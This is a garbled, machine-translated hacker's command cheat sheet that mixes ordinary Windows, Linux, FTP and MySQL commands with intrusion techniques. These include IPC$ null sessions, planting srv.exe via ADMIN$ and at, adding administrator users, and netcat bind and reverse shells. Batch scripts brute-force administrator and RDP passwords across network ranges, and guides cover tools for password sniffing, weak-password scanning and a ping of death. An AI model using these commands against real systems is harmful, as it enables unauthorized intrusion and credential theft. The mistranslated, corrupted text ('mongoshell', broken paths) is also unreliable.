Net use \ IP \ IPC $ ""/User: "" Create an empty IPC Link
Net use \ IP \ IPC $ "password"/User: "User Name" Create an IPC non-empty Link
Net use H: \ IP \ C $ "password"/User: "User Name" directly log on and map to the other Party C: to the local
H:
Net use H: \ IP \ C $ after login ing to the other Party C: to the local h:
Net use \ IP \ IPC $/del Delete IPC Link
. Net use H:/DEL: Delete the H ing from the ing peer to the local host that is H:
Net user username and password/Add create user
Net user guest/active: yes to activate the Guest user
. Net user.
Net user account name view account attributes
Net localgroup administrators user name/Add add "user" to the Administrator
You have administrator permissions. Note: Add "S" to the Administrator and use the plural value.
Net start to check which services are enabled
. Net start service name. (For example, Net start Telnet and Net start Schedule)
Net stop service name to stop a service
Net time \ target IP address view peer time
Net time \ target IP/set sets the time synchronization between the local computer time and the "target IP" host, and adds
The above parameter/Yes can cancel the confirmation Information
. Net view.
Net view \ IP to view which shares are enabled in the Peer LAN
Net config display system network settings
. Net logoff disconnection sharing
. Net pause service name: suspend a service
Net send IP "Text Information" sends information to the recipient
Network Connection type and information being used in the net ver LAN
. NET Share
NET Share IPC $ enable IPC $ share
NET Share IPC $/del Delete IPC $ share
NET Share C $/del Delete C: Share
Net user guest 12345 after logging in with the guest user, change the password to 12345
Net Password Change System Login Password
Netstat-A is usually used to check which ports are enabled.
Netstat-N is commonly used to view the network connection of a port.
Netstat-V view ongoing work
Netstat-P protocol name: netstat-p tcq/IP
Protocol usage)
Netstat-S: view all protocol usage in use
NBTSTAT-a ip address, if one of the ports from 136 to 139 is enabled, you can view the port
Username (username before 03)-Note: Parameter-A should be capitalized
Tracert-parameter IP (or computer name) tracking route (packet), parameter: "-W number" is used to set
Set the timeout interval.
Ping An IP address (or domain name) to send 32-byte data to the host. Parameter: "-l [space]
Packet size ";"-N number of sent data ";"-T "indicates that the Ping is performed continuously.
Ping-T-l 65550 IP address death Ping (send a file larger than 64 KB and ping it until it is killed
Ping)
Ipconfig (winipcfg) is used for Windows NT and XP (Windows 95 98) to view the local IP address,
The available parameter "/all" in ipconfig displays all configuration information.
Tlist-T displays processes in the tree line list (this is an additional tool for the system, which is not installed by default.
Directory in the support/Tools Folder)
After the kill-f process name is added with the-F parameter, a process is forcibly terminated (this is an additional tool for the system. By default, no security
Installed in the support/tools folder of the installation directory)
After the Del-F file name is added with the-F parameter, the read-only file can be deleted./AR,/AH,/As,/AA respectively indicate deletion.
Read-only, hidden, system, archive file,/a-r,/a-h,/a-s,/A-A indicates removing read-only, hidden
, System, files other than archive. For example, "del/AR *. *" indicates deleting all read-only files in the current directory.
, "Del/A-S *. *" indicates deleting all files except system files in the current directory
Del/S/Q directory or use: rmdir/S/Q directory/s to delete all subdirectories and
File. At the same time, you can use the parameter/Q to cancel the deletion operation and then delete it directly. (Two commands are used
Same)
Move drive letter \ path \ file name to be moved storage path of the mobile file \ move the file name to move the file
, Use the parameter/y to cancel the prompt that the Mobile Directory has the same file and overwrite it directly.
FC one.txt two.txt> 3st.txt compares two files and outputs them to the 3st.txt file.
, ">" And ">" are redirect commands
At ID: Enable a registered scheduled task
At/delete: stops all scheduled tasks. Use the/Yes parameter to stop the tasks without confirmation.
At ID/delete: Stop a registered scheduled task
At view all scheduled tasks
At \ IP timeProgramName (or a command)/R runs a program of the other party at a certain time and restarts the computing
Machine
Finger username @ host
Telnet IP port: Remote and login server, default port: 23
Connecting an open IP address to an IP address (the command after Telnet logon)
Telnet directly type telnet on the local machine to enter the local telnet
Copy path \ file name 1 path \ file name 2/y copy file 1 to the specified directory as file 2, with Parameters
/Y at the same time cancel confirming you want to rewrite an existing directory file
Copy c: \ srv.exe \ IP \ ADMIN $ copy local c: \ srv.exe to the admin of the other party
Cppy 1st.jpg/b4242st.txt/A 3st.jpg: The content of 2st.txt is hidden in 1st.jpg.
3st.jpg new file. Note: the file header of 2st.txt should be empty in three rows. Parameter:/B Indicates binary file,/a indicates
Files in ascll format
Copy \ IP \ ADMIN $ \ svv.exe C :\or: Copy \ IP \ ADMIN $ \ *. * copy the admini shared by the other party
The following srv.exe file (all files) to the local C:
The target address of the file or directory tree to be copied in xcopy. copy the file and directory tree by using the/y parameter.
Will not be prompted to overwrite the same file
TFTP-I self-IP address (this is the IP address of the BOT when the bot is used as the stepping stone) Get server.exe c: \ server.exe
After login, download the server.exe of the specified IP address to the target host c: \ server.exe parameter:-I indicates
In hexadecimal mode, for example, when an EXE file is transferred. If-I is not added, the file is transmitted in ASCII mode.
Transfer
After logging on to the TFTP-I peer IP put c: \ server.exe, upload the local c: \ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to second
Binary transfer (Executable File in); default: ASCII transfer (when a text file is used)
Route print displays the IP route, which displays the network address network addres and subnet mask.
Netmask, gateway address addres, interface address
ARP is used to view and process ARP caches. ARP is used to resolve an IP address into a physical IP address.
MAC address. ARP-A displays all information
Start program name or command/max or/min open a new window and maximize (minimize) run a program
Sequence or command
Mem view CPU usage
Attrib file name (directory name) to view the attributes of a file (directory)
Attrib file name-a-r-s-h or + A + R + S + H remove (ADD) the archive of a file, read-only
, System, hide attributes; + is added as an attribute
Dir: view the file. The parameter:/Q indicates which user of the file and directory belongs to, And/T: C indicates when the file is created.
,/T: A indicates the time when the file was last accessed,/t: W indicates the time when the file was last modified.
Date/t, time/t use this parameter, that is, "date/T", "Time/t" will only display the current date and
Time, instead of entering a new date and time
Set specifies the environment variable name = the character to be assigned to the variable to set the environment variable
Set displays all current environment variables
Set P (or other characters) displays all environment variables starting with P (or other characters ).
Pause pause the batch processing program and display: press any key to continue ....
If execute condition processing in the batch processing program (for more information, see if command and variable)
The Goto tag directs cmd.exe to the rows with labels in the batch processing program (the tag must be a separate row and
Start with a colon, for example, the ": Start" label)
Call path \ batch processing file name call another batch processing program from the batch processing program (for more information, see
Call /?)
For execution of a specific command on each file in a group of files (for more information, see for command and variable)
Echo ON or OFF enables or disables echo. The current echo settings are displayed only when ECHO is used without parameters.
Echo information is displayed on the screen
Echo information> pass.txt: Save "information" to the pass.txt File
Findstr "hello" aa.txt search for the string hello in the aa.txt File
Find file name to find a file
Title name change the title name of the CMD window
Set the color value to the foreground and background colors of the CMD console. 0 = Black, 1 = blue, 2 = green, 3 = light green.
4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, c = light red,
D = light purple, E = light yellow, F = bright white
The prompt name is changed to the command prompt displayed by cmd.exe (Change c: \ and D: \ To entsky \)
Print file name print text file
Ver displays version information in the DOS window
In the winver pop-up window, the version information (memory size, system version, patch version, and computer name) is displayed.
)
Format drive letter/Fs: Type format disk, type: fat, FAT32, NTFS, for example: Format D:
/Fs: NTFS
MD directory name create directory
Replace the directory of the source file to be replaced
Rename original file name New File Name
Tree displays the directory in a tree structure, and uses the-F parameter to list the file names in the first folder.
Type file name display text file content
More file names display output files on screen
Doskey command to be locked = character
Doskey UNLOCK command = Lock Command provided for DOS (edit command line, re-call Win2k command,
And create a macro ). For example, run the following command to lock the Dir: doskey dir = entsky (doskey dir = dir cannot be used );
Unlock: doskey dir =
Taskmgr call up the Task Manager
Chkdsk/f d: Check disk D and display status report; add parameter/F and fix disk errors
Tlntadmn telnt service admn, type tlntadmn to select 3, and then select 8, you can change the Telnet Service
The default port 23 is any other port.
Exit to exit the cmd.exe program. Currently, the parameter/B is used to exit the current batch processing script, not cmd.exe.
Path \ the file name of the executable file sets a path for the executable file.
CMD starts a Windows 2 K Command explanation window. Parameters:/Eff,/EN, and enable command extension.
For more information, see CMD /?
Regedit/s registry file name import to registry; parameter/s indicates quiet mode import, no prompt;
Regedit/e registry file name export Registry
Cacls file name parameters display or modify the file access control list (ACL)-for NTFs format
. Parameter:/d User name: Set to deny access to a user;/P user name ERM to replace the access of the specified user
Permission;/g username erm gives the specified user access permission; perm can be: N none, r read,
W write, c Change (write), f full control; example: cacls D: \ test.txt/d pub settings
D: \ test.txt rejects pub user access.
Cacls file name to view the object access user permission list
Add annotation to the batch file for REM text content
Netsh to view or change the local network configuration
IIS service command:
Iisreset/reboot restart Win2k computer (but a message is prompted that the system will restart)
Iisreset/start or stop all Internet services
Iisreset/restart stop and restart all Internet services
Iisreset/status displays the status of all Internet services
Iisreset/enable or disable enable/disable Internet service on the local system
Dynamic
Iisreset/rebootonerror if an error occurs when the Internet service is started, stopped, or restarted
Reboot by mistake
Iisreset/noforce: if the Internet service cannot be stopped, the internet service will not be forcibly terminated.
When the iisreset/timeout Val reaches the time (in seconds), the Internet service is not stopped. If you specify
/Rebootonerror parameter, the computer will reboot. The default value is restart for 20 seconds and stop for 60 seconds.
, Reboot for 0 seconds.
FTP command: (details are provided later)
The FTP command line format is:
FTP-v-d-I-n-g [host name]-V displays all the response information of the remote server.
-D. Use the debugging method.
-N restrict FTP automatic logon, that is, the. netrc file is not used.
-G cancels the global file name.
Help [command] or? [Command] view command instructions
Bye or quit terminates the FTP process on the host and exits FTP management.
PWD list the current remote host directory
Put or send local file name [file name uploaded to the host] transfers a local file to the remote end
Host
Get or Recv [remote host file name] [download to local file name] transfer from remote host
Local host
Mget [Remote-files] receives a batch of files from the remote host to the local host.
Mput local-files transfers a batch of files from the local host to the remote host
DIR or ls [Remote-Directory] [local-file] to list files in the directory of the current remote host.
If a local file exists, write the result to the local file.
ASCII settings transfer files in ASCII mode (default)
Bin or image sets File Transfer in binary mode
Bell sends an alarm every time a file is transferred.
Cdup returns to the upper-level directory
Close interrupts the FTP session with the remote server (corresponds to open)
Open host [port] To establish a connection to the specified FTP server. You can specify the connection port.
Delete Delete delete files from the remote host
Mdelete [Remote-files] deletes a batch of Files
Mkdir directory-Name: create a directory in the remote host
RENAME [from] [to] Change the file name in the remote host
Rmdir directory-Name: Delete the directory in the remote host
Status: displays the status of the current FTP
System displays the remote host system type
User user-name [Password] [account] log on to the remote host with another user name
Open host [port] re-establishes a new connection
Prompt interaction prompt Mode
Macdef macro commands
The LCD changes the working directory of the current local host. If it is set to default, it is transferred to the Home Directory of the current user.
Chmod changes the File Permission of the remote host
When the case is on, use the mget command to copy the file name to the local machine, convert all to lowercase letters
CD remote-Dir: Enter the remote host directory
Cdup enters the parent directory of the remote host directory
! Execute the interactive shell on the local machine and exit to return to the FTP environment, such! Ls *. Zip
MySQL command:
Mysql-H host address-u user name-P password to connect to MySQL; If MySQL is just installed, superuser
Root does not have a password.
(For example, MySQL-h110.110.110.110-uroot-p123456)
Note: U and root do not need to add spaces. The same applies to others)
Exit to exit MySQL
Mysqladmin-u username-P old Password New Password Change Password
Grant select on database. * To username @ login host identified by \ "password \"; add
Add a new user. (Note: Unlike the preceding commands
With a semicolon as the command Terminator)
Show databases; displays the Database List. At the beginning, there were only two databases: MySQL and test.
The MySQL database contains MySQL system information. We change the password and add new users, which is actually
Use this database for operations.
Use MySQL;
Show tables; displays data tables in the database
Describe table name; displays the table structure
Create Database database name; database creation
Use Database Name;
Create Table Name (field setting list); Create Table
Drop database database name;
Drop table name; delete database and table
Delete from table name; clear table records
Select * from table name; displays records in the table
Mysqldump -- opt school> school. BBB: (the command is run in \ mysql \ bin of DOS.
Directory); Note: Back up the database school to the school. BBB file. School. BBB is
Text File and file name. Open it and you will find new information.
Add commands in win2003 System (practical part ):
Shutdown/the parameter disables or restarts the local or remote host.
Parameter description:/s disables the host,/R restarts the host,/t number sets the delay time, range 0 ~ 180
In seconds,/a cancels the boot, And/M // the remote host specified by the IP address.
Example: shutdown/R/T 0 restart the local host immediately (no delay)
Taskill/the parameter process name or PID of the process to terminate one or more tasks and processes.
Parameter description:/PID: PID of the process to be terminated. Use the tasklist command to obtain the PID of each process.
Name of the process to be terminated,/F force terminate the process,/t terminate the specified process and its sub-Processes
.
Tasklist displays the process labels of processes, services, and services running on local and remote hosts.
Identifier (PID ).
Parameter description:/M lists the DLL files loaded by the current process./svc displays the services of each process,
If no parameter exists, only the current process is listed.
Basic commands in Linux: Case Sensitive
Uname: displays version information (same as that of Win2k)
Dir: displays the current directory file. ls-AL: displays hidden files (same as windows 2 k DIR)
PWD query the current directory location
CD .. go back to the previous directory. Note that there is a space between CD and. CD/return to the root directory.
Cat file name View File Content
Cat> abc.txt write the content into the abc.txt file.
The more File Name displays a text file on one page.
CP copy file
MV mobile File
RM file name delete file, Rm-a directory name Delete directory and subdirectory
Create directory by mkdir directory name
Rmdir: Delete the sub-directory. There is no document in the directory.
Chmod sets the access permission for files or directories
Grep searches for strings in the file
Comparison of diff Archives
Find file search
Current date and time of date
Who queries the people who are using the same machine as you and the login time and location
W. query the detailed information of the current host.
Whoami
Groups
Passwd Change Password
History
PS displays the Process status
Kill to stop a process
GCC hackers usually use it to compile files written in C language.
Su permission conversion to specified user
Telnet the IP address to connect to the host (same as Win2k). When bash $ is displayed, the connection is successful.
FTP connection to a server (same as Win2k)
Appendix: batch processing commands and variables
1: Basic Format of for commands and variables:
For/parameter % variable in (SET) do command [command_parameters] % variable:
Specify a single letter replaceable parameter, such as: % I, and specify a variable with: % I, and call
For variables, use: % I %. variables are case sensitive (% I is not equal to % I ).
Each batch can process 10 variables from % 0-% 9, of which % 0 is used by default for batch file names, % 1
The default value is the first value entered when this batch is used. Similarly, % 2-% 9 indicates the 2-9 value entered. For example:
: Net use \ IP \ IPC $ pass/User: IP address in user is % 1, pass is % 2, and user is % 3
(SET): Specifies one or more files. Wildcards can be used, such as: (D: \ user.txt) and (1 1 254) (1
-1 254), {"(1 1 254)" the first "1" indicates the start value, the second "1" indicates the growth volume, and the third "254"
End value, that is, from 1 to 254; "(1-1 254)" Description: from 254 to 1}
Command: Specifies the command to be executed on the first file, such as the net use command. If you want to execute multiple commands
, The command is separated: &.
Command_parameters: specify a parameter or command line switch for a specific command
In (SET): refers to the value in (SET); do command: refers to the execution of command
Parameter:/L indicates that the incremental form {(SET) is the incremental form};/F indicates that the value is continuously taken from the file
Until {(SET) is a file, such as (D: \ pass.txt }.
Example:
@ Echo off
Echo format: Test. bat *. *. *> test.txt
For/L % G in (1 1 254) Do echo % 1.% G> test.txt & net use \ % 1.% G
/User: Administrator | find "command completed successfully"> test.txt
Save as test. bat. Note: Try to create administrator for the 254 IP addresses of a specified class C network segment.
If the password is null, the IP address is stored in test.txt.
/L indicates the incremental format (from 1-254 or-1). The first three IP addresses are entered: *. *. * is the default value for batch processing.
% 1; % G is the variable (the last bit of the IP); & used to separate the echo and net use commands;
| Indicates that after IPC $ is created, use find in the result to check whether "command is successfully completed" information; % 1.% G is
The complete IP address; (1 1 254) indicates the starting value, growth volume, and end value.
@ Echo off
Echo format: OK. Bat IP
For/F % I In (d: \ User. DIC) Do smb.exe % 1% % I D: \ Pass. DIC 200
Saved as: OK .exe Description: after entering an IP address, use the dictionary file D: \ Pass. DIC to crack D: \ User. DIC.
The user password in the file until the value of the file is obtained. % I is the user name; % 1 is the input IP address (default
).
2: If command and variable basic format:
If [not] errorlevel numeric command statement if the program runs the program and returns a value equal to or greater
Specifies the exit encoding of the number and specifies the condition as "true ".
For example, if errorlevel 0 indicates that when the value returned after the program is executed is 0, the command following the value is returned;
If not errorlevel 1 indicates that the value returned after the program is executed is not equal to 1.
.
0 indicates that the task is detected and executed successfully (true). 1 indicates that the task is not found or executed (false ).
If [not] string 1 = string 2 command statement if the specified text string matches (that is: String
1 is equal to string 2.
For example, "if" % 2% "=" 4 "Goto start" indicates that if the second input variable is 4
(Note: when calling the variable, % variable name % is added "")
If [not] exist file name command statement if the specified file name exists, execute the following command.
For example, "If not nc.exe goto end" indicates that if the nc.exe file is not found, it will jump to the ": End" mark.
Signature.
If [not] errorlevel numeric command statement else command statement or if [not] string 1 = word
String 2 command statement else command statement or if [not] exist file name command statement else command
After an else command statement is added, it indicates that when the current condition is invalid, it indicates the life after the else line.
. Note: else must be in the same line as if to be valid. When there is a del command, you need to set all del commands
The content is enclosed by <> because the del command can be executed only when a single line is used. After using <>, It is equal
A row. For example, "If exist test.txt. Else echo
Test.txt. Missing ". Pay attention to". "In the command
(2) system external commands (related tools must be downloaded ):
1. Swiss Army knife: nc.exe
Parameter description:
-H: View help information
-D background Mode
-E prog program redirection, once the connection is executed [dangerous]
-I secs latency Interval
-L listening mode for inbound connection
-L listening mode. After the connection day is closed, the listener continues until the CTR + c
-N ip address, cannot use Domain Name
-O film records hexadecimal Transmission
-P [space] local port number
-R random local and remote ports
-T use Telnet Interaction Mode
-U udp Mode
-V: Detailed output. Use-VV to show more details.
-W digital timeout delay interval
-Z: Turn off the input and output (used to scan the anchor)
Basic usage:
NC-nvv 192.168.0.1 80 connects to port 80 of the host 192.168.0.1
NC-l-P 80 enables TCP port 80 of the Local Machine and listens
NC-nvv-W2-Z 192.168.0.1 80-1024 scan the port 80-1024 of 192.168.0.1
NC-l-P 5354-t-e c: winntsystem3220..exe bind the remote host's mongoshell in
Remote TCP port 5354
NC-t-e c: winntsystem320000.exe 192.168.0.2 5354 set the remote host
Mongoshell and reverse connect to port 5354 of 192.168.0.2
Advanced usage:
1 for NC-l-P 80 as a honeypot: Enable and constantly listen to port 80 until CTR + c
NC-l-P 80> C: \ log.txt is used as a honeypot. 2: Enable and constantly listen to port 80
CTR + C and output the result to c: \ log.txt
NC-l-P 80 <c: \ honeyport.txt is used as a honeypot. Use 3-1: Enable and continuously listen to port 80,
Until the CTR + c and the content in c: \ honeyport.txt are sent to the pipeline, the file can also be transferred.
Type.exe c: \ honeyport | nc-l-P 80 is used as a honeypot 3-2: Enabling and continuously listening to 80 Terminals
Port, until the CTR + C, and the c: \ honeyport.txt content into the pipeline, can also play the role of transferring files
Local Port: NC-l-P
Use nc-e cmd.exe local IP address-P local port * Win2k on the target host
NC-E/bin/sh local IP-P local port * Linux, Unix reverse connection breaks through the fire prevention of the opposite host
Wall
Local Port: NC-D-l-P <file path and name to be transferred
Use the local IP address nc-VV on the host to store the file path and name to transfer the file.
To host
Secondary note:
| MPs queue command
<Or> redirect command. "<", For example, tlntadmn <test.txt indicates the content of test.txt.
Assign a value to the tlntadmn command
@ Indicates that the command after @ is executed, but it is not displayed (executed in the background); for example: @ dir c: \ winnt
> D: \ log.txt indicates that the Dir is executed in the background and the result is stored in D: \ log.txt.
> And> difference ">" means: overwrite; ">" means: Save to (add ).
For example: @ dir c: \ WINNT> D: \ log.txt and @ dir c: \ WINNT> D: \ log.txt
Execute the secondary comparison. If you use>, the secondary results are saved. If you use:>, only one result is returned.
Because the second result overwrites the first one.
2. Scan the anchor tool: xscan.exe
Basic Format
Xscan-host <start IP address> [-<end IP address>] <check item> [other options] scan anchor "Start IP address to end
All host information of IP segments
Xscan-file
All host information in"
Detection item
-Active: checks whether the host is alive.
-OS remote operating system type detection (via NetBIOS and SNMP Protocol)
-Port: checks the port status of common services.
-FTP weak FTP password detection
-Pub checks anonymous FTP Service User Write Permissions
-POP3 weak POP3-Server password detection
-SMTP-Server Vulnerability Detection
-SQL detection SQL-server Weak Password
-SMB detects weak NT-server passwords
-IIS detects the IIS encoding/Decoding Vulnerability
-CGI Vulnerability Detection
-NASL loads the Nessus Attack Script
-All: detects all the above items.
Other options
-I adapter number: Set the network adapter. <adapter number> You can obtain it through the "-l" parameter.
-L display all network adapters
-V: displays the detailed scan progress.
-P skips the host with No Response
-O skips hosts with no ports Detected
-T: number of concurrent threads. The number of concurrent hosts specifies the maximum number of concurrent threads and the number of concurrent hosts.
Recognition quantity:, 10
-Log File Name: Specifies the scan report file name (Suffix: txt or HTML files)
Usage example
Xscan-host 192.168.1.1-192.168.255.255-all-active-P Detection
192.168.1.1-all vulnerabilities of hosts in the 192.168.255.255 network segment, skipping unresponsive hosts
Xscan-host 192.168.1.1-192.168.255.255-Port-SMB-T 150-O Detection
192.168.1.1-Standard Port Status of the host in the 192.168.255.255 network segment, NT weak password user, Max
The number of concurrent threads is 150, skipping hosts that do not detect open ports
Xscan-file hostlist.txt-Port-CGI-T, 5-v-o detects “hostlist.txt"
The standard port status of all hosts listed in the file. It is a CGI vulnerability and the maximum number of concurrent threads is 200.
A maximum of five hosts can be detected at a time, and detailed detection progress is displayed. Skip hosts that do not detect open ports.
3. Command Line sniffer: xsniff.exe
Attackers can Capture FTP, SMTP, POP3, and HTTP passwords in a LAN.
Parameter description
-TCP output TCP Datagram
-Udp output UDP datagram
-ICMP: Output ICMP Datagram
-Pass: Filter password information
-Hide background running
-Host resolution Host Name
-Addr ip address filtering IP Address
-Port port filtering Port
-Log File Name: Save the output to the file
-ASC output in ASCII format
-Hex output in hexadecimal format
Usage example
Xsniff.exe-pass-hide-log pass. Log runs the sniffing password in the background and stores the password information in
In the pass. Log File
Xsniff.exe-TCP-UDP-ASC-ADDR 192.168.1.1 sniff 192.168.1.1 and filter TCP and
UDP information and output in ASCII format
4. Terminal Service password cracking: tscrack.exe
Parameter description
-H Show Help
-V: display version information
-S: decryption capability on the screen
-The voice sent when B's password is incorrect
-T: multiple connections (multithreading)
-N prevent system log entries on targeted server
-U uninstall and remove the tscrack component
-F: Use the password after-f.
-F interval (frequency)
-L use the username after-l
-W: Use the password dictionary after-W
-P: Use the password after-P
-D. log on to the home page.
Usage example
Tscrack 192.168.0.1-l administrator-W pass. DIC remote dictionary file brute-force
Logon password of the host Administrator
Tscrack 192.168.0.1-l administrator-P 123456 remote login with password 123456
Administrator user of 192.168.0.1
@ If not exist ipcscan.txt goto noscan
@ For/F "tokens = 1 delims =" % I in (3389.txt) Do call hack. Bat % I
Nscan
@ Echo 3389.txt no find or scan faild
(① Saved as 3389.bat) (assuming that superscan or another scanner is used to scan a batch of active 3389
Host ipsag file 3389.txt)
3389. BAT means: Get an IP address from the 3389.txt file, and then run hack. bat
@ If not exist tscrack.exe goto noscan
@ Tscrack % 1-l administrator-W pass. DIC> rouji.txt
: Noscan
@ Echo tscrack.exe no find or scan faild
(② Save As hack. BAT) (run 3389.baton OK ,3389.bat0000hack.bat00003389.txt,
Pass.dicand tscrack.exe are in the same directory. You can wait for the result)
Hack. BAT means: run the tscrack.execode to crack
The administratorpassword, And the cracking result is saved in the rouji.txt file.
5. Others:
Shutdown.exe
Shutdown \ IP address T: 20 seconds later, the other NT will be automatically disabled (Windows 2003 built-in tool)
To use Windows, you must download this tool. In the previous Windows 2003 doscommand
For more information, see .)
Fpipe.exe (TCP port redirection tool) is described in the second article (Port redirection bypass fire prevention ).
Wall)
Fpipe-L 80-s 1029-R 80 [url] www.sina.com.cn [/url]
The result is the host information of [url] www.sina.com.cn [/url ].
Fpipe-L 23-s 88-R 23 the destination IP address sends the port 23 Telnet request to the destination IP address
After the port is redirected, port 88 is sent to port 23 of the target IP address. (When establishing a telnet connection with the target IP Address
Connect the server with port 88) And then: connect to the server through Telnet 127.0.0.1 (local IP address ).
Port 23 of the target IP address.
Opentelnet.exe (remotely Enable Telnet)
Opentelnet.exe \ IP account password NTLM authentication telnet port (no need to upload
Ntlm.exe destroys Microsoft's authentication method.) It is available after the telnet service of the other party is enabled remotely.
Telnet \ IP to connect to the other party.
NTLM authentication method: 0: NTLM authentication is not used; 1: NTLM authentication is attempted first, if it fails
And then use the user name and password. 2: only use NTLM for authentication.
Resumetelnet.exe (another tool included with opentelnet)
After resumetelnet.exe \ IP account password is connected to the other Party through telnet, use this command
Restore the peer's telnet settings and disable the Telnet service.
6. FTP commands:
FTP commands are one of the most frequently used commands by Internet users. You are familiar with and can flexibly use ftp Internal commands.
To greatly facilitate users and get twice the result with half the effort. If you want to learn how to use FTP in the background
You must learn FTP commands.
The FTP command line format is:
FTP-v-d-I-n-g [host name], where
-V: displays all the response information of the remote server;
-N: Restrict FTP automatic logon, that is, do not use;. N etrc file;
-D. Use the debugging method;
-g cancel the Global File name